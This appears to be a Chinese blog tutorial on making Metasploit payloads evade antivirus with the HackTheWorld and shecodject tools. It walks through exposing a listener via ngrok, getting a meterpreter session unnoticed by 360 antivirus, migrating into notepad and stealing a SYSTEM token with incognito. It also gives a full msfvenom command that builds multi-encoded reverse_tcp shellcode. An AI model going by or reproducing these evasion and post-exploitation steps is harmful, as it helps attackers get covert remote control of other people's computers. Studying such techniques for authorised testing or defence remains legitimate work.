免杀之HackTheWorld与Shecodject

1、HackTheWorld

Git:https://github.com/stormshadow07/HackTheWorld

安装环境python2,相关依赖环境。

 

生成一个msf免杀payload:

首先设置payload类型:

其中LHOST可以使用ngrok内网映射工具,将本地kali反射到公网。

LPORT是通过ngrok进行反射时分配的端口。

实验过程中TCP类型的Payload被360查杀,https类型未被查杀。

之后就是输入密钥等等。

开启msf的监听模块:

运行程序之后,未触发360,成功获取session:

原进程在火绒剑中属于异常进程,获取session之后首先进行进程迁移:

迁移到notepad进程。

 

权限提升:

通过令牌窃取提升权限:

首先是低权用户,直接getsystem失败:

导入incognito模块:

列出可用令牌:

窃取system令牌:

注意添加双引号和两个反斜杠

成功获取SYSTEM权限:

 

 

 

 

第二款工具:shecodject

Git地址:https://github.com/TaroballzChen/shecodject

安装环境说明:2020版kali安装过程使用root权限安装,工具通过docker进行打包,会使用到docker镜像,安装完成之后最好将docker源换成国内源。

 

1、通过mpr方式生成免杀shellcode

执行run命令,会生成shellcode的临时文件:

之后back回到系统命令,然后输入exe对之前生成的临时文件进行打包:

此处设置noconsole的值会影响360的查杀,有控制台是360不能查杀,无console时会被查杀。

之后run既可以。

Noconsole被查杀

 

存在concole的没有被查杀:

并且成功获取session

 

 

2、

首先生成pem证书:

合并rsaprivate.key和servercertifcate.crt为pem文件:

使用msfvenom生成原始的shellcode:

这里使用多次编码生成原始文件:

命令:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.135.139 Lport=4444 --platform windows -a x86 HandlerSSLCert=./my.pem StagerVerifySSLCert=true -s 42 --smallest -e x86/shikata_ga_nai -i 9 -f raw | msfvenom --platform windows -a x86 -e x86/countdown -i 8 -f raw | msfvenom --platform windows -a x86 -e x86/call4_dword_xor -i 6 -b "\x00\x0a\x0d" -f raw > ./shellcode.raw

 

利用shecodject进行免杀:

使用scc模块,将raw生成tmp文件:

然后利用exe模块进行打包:

有console的状态免杀:

测试无console,免杀:

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章